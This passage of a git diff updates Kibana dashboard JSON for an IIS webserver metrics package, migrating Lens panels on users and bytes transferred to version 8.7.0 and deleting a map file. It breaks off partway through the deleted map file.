"isBucketed": false, + "label": "overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", + "isFormulaBroken": false + }, + "references": [ + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1" + ], + "scale": "ratio" + }, + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.network.total_non_anonymous_users: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_non_anonymous_users" + }, + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", + "operationType": "overall_max", + "references": [ + "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#D31569", + "layerId": "c8eba081-fa85-43a3-adee-81a6c126dd30", + "layerType": "data", + "maxAccessor": "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d", + "metricAccessor": "18a755c6-6629-48e2-a173-4401811e0776", + "progressDirection": "horizontal" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Non Anonymous Users" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "6df3b202-cc19-43fe-8832-499d8e22ac22", + "w": 24, + "x": 0, + "y": 21 + }, + "panelIndex": "6df3b202-cc19-43fe-8832-499d8e22ac22", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-8648361e-3dcc-4fc2-85cf-95c3e2f153fe", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-bb78d828-0dd4-449f-afac-291527b423a0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "8648361e-3dcc-4fc2-85cf-95c3e2f153fe": { + "columnOrder": [ + "6eb9be4b-a63d-492a-aec8-35a850ee0cee", + "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" + ], + "columns": { + "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Received/sec", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1, + "suffix": "/s" + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.bytes_received_per_sec" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "6eb9be4b-a63d-492a-aec8-35a850ee0cee": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": true + "bb78d828-0dd4-449f-afac-291527b423a0": { + "columnOrder": [ + "cf1359a7-2549-4939-889b-4f994f49500b", + "d8d922c5-f21f-46e0-945b-409d12e16e34" + ], + "columns": { + "cf1359a7-2549-4939-889b-4f994f49500b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d8d922c5-f21f-46e0-945b-409d12e16e34": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Bytes Sent/sec", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.bytes_sent_per_sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 8, - "i": "bb345920-7514-400f-a69e-be2625824248", - "w": 5, - "x": 0, - "y": 13 + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "bb345920-7514-400f-a69e-be2625824248", - "title": "Current Non Anonymous Users", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-c8eba081-fa85-43a3-adee-81a6c126dd30", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "c8eba081-fa85-43a3-adee-81a6c126dd30": { - "columnOrder": [ - "18a755c6-6629-48e2-a173-4401811e0776", - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d", - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0", - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1" - ], - "columns": { - "18a755c6-6629-48e2-a173-4401811e0776": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_non_anonymous_users: *" - }, - "isBucketed": false, - "label": "Total Non Anonymous Users", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_non_anonymous_users" - }, - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", - "isFormulaBroken": false - }, - "references": [ - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1" - ], - "scale": "ratio" - }, - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.network.total_non_anonymous_users: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_non_anonymous_users" - }, - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.network.total_non_anonymous_users))", - "operationType": "overall_max", - "references": [ - "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726dX0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#D31569", - "layerId": "c8eba081-fa85-43a3-adee-81a6c126dd30", - "layerType": "data", - "maxAccessor": "deefd9f8-8a6f-4a22-ab4a-4c7e69e5726d", - "metricAccessor": "18a755c6-6629-48e2-a173-4401811e0776", - "progressDirection": "horizontal" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "d8d922c5-f21f-46e0-945b-409d12e16e34" + ], + "layerId": "bb78d828-0dd4-449f-afac-291527b423a0", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "cf1359a7-2549-4939-889b-4f994f49500b", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(22,165,165,1)", + "forAccessor": "d8d922c5-f21f-46e0-945b-409d12e16e34" + } + ] + }, + { + "accessors": [ + "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" + ], + "layerId": "8648361e-3dcc-4fc2-85cf-95c3e2f153fe", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": true + "seriesType": "line", + "xAccessor": "6eb9be4b-a63d-492a-aec8-35a850ee0cee", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(250,40,255,1)", + "forAccessor": "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 8, - "i": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69", - "w": 5, - "x": 5, - "y": 13 + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69", - "title": "Total Non Anonymous Users", - "type": "lens", - "version": "8.5.0" + "yRightExtent": { + "mode": "full" + }, + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-8648361e-3dcc-4fc2-85cf-95c3e2f153fe", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-bb78d828-0dd4-449f-afac-291527b423a0", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "8648361e-3dcc-4fc2-85cf-95c3e2f153fe": { - "columnOrder": [ - "6eb9be4b-a63d-492a-aec8-35a850ee0cee", - "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" - ], - "columns": { - "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Bytes Received/sec", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.bytes_received_per_sec" - }, - "6eb9be4b-a63d-492a-aec8-35a850ee0cee": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "bb78d828-0dd4-449f-afac-291527b423a0": { - "columnOrder": [ - "cf1359a7-2549-4939-889b-4f994f49500b", - "d8d922c5-f21f-46e0-945b-409d12e16e34" - ], - "columns": { - "cf1359a7-2549-4939-889b-4f994f49500b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "d8d922c5-f21f-46e0-945b-409d12e16e34": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Bytes Sent/sec", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.bytes_sent_per_sec" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "d8d922c5-f21f-46e0-945b-409d12e16e34" - ], - "layerId": "bb78d828-0dd4-449f-afac-291527b423a0", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "cf1359a7-2549-4939-889b-4f994f49500b", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(22,165,165,1)", - "forAccessor": "d8d922c5-f21f-46e0-945b-409d12e16e34" - } - ] - }, - { - "accessors": [ - "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" - ], - "layerId": "8648361e-3dcc-4fc2-85cf-95c3e2f153fe", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "6eb9be4b-a63d-492a-aec8-35a850ee0cee", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(250,40,255,1)", - "forAccessor": "6d2b62c1-d4ed-4a04-a1d1-4877f6f23760" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Bytes Transferred/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 14, + "i": "a3c9d1bc-611b-45aa-a3de-3750399f11e2", + "w": 24, + "x": 24, + "y": 21 + }, + "panelIndex": "a3c9d1bc-611b-45aa-a3de-3750399f11e2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-52e451a1-4048-4d1c-816d-2182732b5422", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5c6856ee-1070-44d9-b0df-f7505dfe9a66", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "52e451a1-4048-4d1c-816d-2182732b5422": { + "columnOrder": [ + "fabe5744-0cb2-4e51-99da-57d8b3f921e6", + "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" + ], + "columns": { + "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "" + }, + "isBucketed": false, + "label": "Total Bytes Sent ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_bytes_sent" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "fabe5744-0cb2-4e51-99da-57d8b3f921e6": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": false + "5c6856ee-1070-44d9-b0df-f7505dfe9a66": { + "columnOrder": [ + "3250ccbb-fb22-4235-93cd-9e8929be30da", + "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" + ], + "columns": { + "3250ccbb-fb22-4235-93cd-9e8929be30da": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Bytes Received", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.network.total_bytes_received" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 14, - "i": "6df3b202-cc19-43fe-8832-499d8e22ac22", - "w": 24, - "x": 0, - "y": 21 + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "6df3b202-cc19-43fe-8832-499d8e22ac22", - "title": "Bytes Transferred/sec", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-52e451a1-4048-4d1c-816d-2182732b5422", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-5c6856ee-1070-44d9-b0df-f7505dfe9a66", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "52e451a1-4048-4d1c-816d-2182732b5422": { - "columnOrder": [ - "fabe5744-0cb2-4e51-99da-57d8b3f921e6", - "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" - ], - "columns": { - "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "" - }, - "isBucketed": false, - "label": "Total Bytes Sent ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_bytes_sent" - }, - "fabe5744-0cb2-4e51-99da-57d8b3f921e6": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - }, - "5c6856ee-1070-44d9-b0df-f7505dfe9a66": { - "columnOrder": [ - "3250ccbb-fb22-4235-93cd-9e8929be30da", - "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" - ], - "columns": { - "3250ccbb-fb22-4235-93cd-9e8929be30da": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Bytes Received", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.network.total_bytes_received" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" - ], - "layerId": "52e451a1-4048-4d1c-816d-2182732b5422", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "fabe5744-0cb2-4e51-99da-57d8b3f921e6", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(251,158,0,1)", - "forAccessor": "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" - } - ] - }, - { - "accessors": [ - "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" - ], - "layerId": "5c6856ee-1070-44d9-b0df-f7505dfe9a66", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "3250ccbb-fb22-4235-93cd-9e8929be30da", - "yConfig": [ - { - "axisMode": "left", - "color": "#68BC00", - "forAccessor": "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" + ], + "layerId": "52e451a1-4048-4d1c-816d-2182732b5422", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "fabe5744-0cb2-4e51-99da-57d8b3f921e6", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(251,158,0,1)", + "forAccessor": "c4fcae80-9b09-45a1-9241-44cfcc6f3e9e" + } + ] + }, + { + "accessors": [ + "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" + ], + "layerId": "5c6856ee-1070-44d9-b0df-f7505dfe9a66", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "3250ccbb-fb22-4235-93cd-9e8929be30da", + "yConfig": [ + { + "axisMode": "left", + "color": "#68BC00", + "forAccessor": "dc4c2d11-a5d5-4a2c-8dbf-7038bee99e64" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - "gridData": { - "h": 14, - "i": "a3c9d1bc-611b-45aa-a3de-3750399f11e2", - "w": 24, - "x": 24, - "y": 21 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "a3c9d1bc-611b-45aa-a3de-3750399f11e2", - "title": "Total Bytes Transferred", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Metrics IIS] Webserver Overview", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-ebc23240-8572-11ea-91bc-ab084c7ec0e7", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "df67a70e-5ca5-4822-9abf-98f68987176b:indexpattern-datasource-layer-7d537da3-5163-404f-8219-5848d516628c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc:indexpattern-datasource-layer-07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a:indexpattern-datasource-layer-ec54661b-482d-438e-b841-7ef6909d49a4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "73702fa8-d011-45cc-af6c-9dd7c55701d9:indexpattern-datasource-layer-3221f0ac-7ba8-4ca4-95fb-e81242261449", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c523cd66-328a-41e9-bce9-1e1f95bae5de:indexpattern-datasource-layer-4c16bca9-c2d9-43d0-ae94-22640d5d1137", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cbb280fb-dbc3-4b82-9c48-788c4254619d:indexpattern-datasource-layer-264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-61df5fc7-b10c-4aba-9ef7-4f40a34d9419", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-8238eaa5-3c3c-46e9-9a09-abee137c1fbf", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "bb345920-7514-400f-a69e-be2625824248:indexpattern-datasource-layer-cfcc9b57-93b7-4830-9c93-82a29dc4aeee", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69:indexpattern-datasource-layer-c8eba081-fa85-43a3-adee-81a6c126dd30", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6df3b202-cc19-43fe-8832-499d8e22ac22:indexpattern-datasource-layer-8648361e-3dcc-4fc2-85cf-95c3e2f153fe", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6df3b202-cc19-43fe-8832-499d8e22ac22:indexpattern-datasource-layer-bb78d828-0dd4-449f-afac-291527b423a0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3c9d1bc-611b-45aa-a3de-3750399f11e2:indexpattern-datasource-layer-52e451a1-4048-4d1c-816d-2182732b5422", - "type": "index-pattern" + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" }, - { - "id": "metrics-*", - "name": "a3c9d1bc-611b-45aa-a3de-3750399f11e2:indexpattern-datasource-layer-5c6856ee-1070-44d9-b0df-f7505dfe9a66", - "type": "index-pattern" - } + "title": "Total Bytes Transferred" + } ], - "type": "dashboard" + "timeRestore": false, + "title": "[Metrics IIS] Webserver Overview", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "df67a70e-5ca5-4822-9abf-98f68987176b:indexpattern-datasource-layer-7d537da3-5163-404f-8219-5848d516628c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e2566135-ecc8-44a1-bbbd-9281dec8a9cc:indexpattern-datasource-layer-07e96b37-8ca1-4d7c-bb37-99e4caa36c6f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1798fa09-93f8-4dfc-85fa-6fc45fdd723a:indexpattern-datasource-layer-ec54661b-482d-438e-b841-7ef6909d49a4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "73702fa8-d011-45cc-af6c-9dd7c55701d9:indexpattern-datasource-layer-3221f0ac-7ba8-4ca4-95fb-e81242261449", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c523cd66-328a-41e9-bce9-1e1f95bae5de:indexpattern-datasource-layer-4c16bca9-c2d9-43d0-ae94-22640d5d1137", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cbb280fb-dbc3-4b82-9c48-788c4254619d:indexpattern-datasource-layer-264d96bd-c47d-47c0-bb24-eb3d1a4dd46a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-61df5fc7-b10c-4aba-9ef7-4f40a34d9419", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-6cb1d19a-e033-4dc3-8aa4-0eef6b6ebb42", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "89279953-dda3-4340-b049-bb52c2cbbeb8:indexpattern-datasource-layer-8238eaa5-3c3c-46e9-9a09-abee137c1fbf", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "bb345920-7514-400f-a69e-be2625824248:indexpattern-datasource-layer-cfcc9b57-93b7-4830-9c93-82a29dc4aeee", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d35799cc-1fd4-4ec8-8e94-56b5ee21cc69:indexpattern-datasource-layer-c8eba081-fa85-43a3-adee-81a6c126dd30", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6df3b202-cc19-43fe-8832-499d8e22ac22:indexpattern-datasource-layer-8648361e-3dcc-4fc2-85cf-95c3e2f153fe", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6df3b202-cc19-43fe-8832-499d8e22ac22:indexpattern-datasource-layer-bb78d828-0dd4-449f-afac-291527b423a0", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3c9d1bc-611b-45aa-a3de-3750399f11e2:indexpattern-datasource-layer-52e451a1-4048-4d1c-816d-2182732b5422", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3c9d1bc-611b-45aa-a3de-3750399f11e2:indexpattern-datasource-layer-5c6856ee-1070-44d9-b0df-f7505dfe9a66", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/iis/kibana/map/iis-0ac17980-e1d8-11ec-baf0-970634a1784d.json b/packages/iis/kibana/map/iis-0ac17980-e1d8-11ec-baf0-970634a1784d.json deleted file mode 100644 index 0ad48fcc218..00000000000 --- a/packages/iis/kibana/map/iis-0ac17980-e1d8-11ec-baf0-970634a1784d.json +++ /dev/null @@ -1,211 +0,0 @@ -{ - "attributes": { - "description": "", - "layerListJSON": [ - { - "alpha": 1, - "id": "5875b362-0633-4f76-a8d3-6e24337bacc0", - "includeInFitToBounds": true, - "label": null, - "maxZoom": 24, - "minZoom": 0, - "sourceDescriptor": { - "isAutoSelect": true, - "lightModeDefault": "road_map_desaturated", - "type": "EMS_TMS" - }, - "style": { - "type": "TILE" - }, - "type": "EMS_VECTOR_TILE", - "visible": true - }, - { - "alpha": 0.75, - "id": 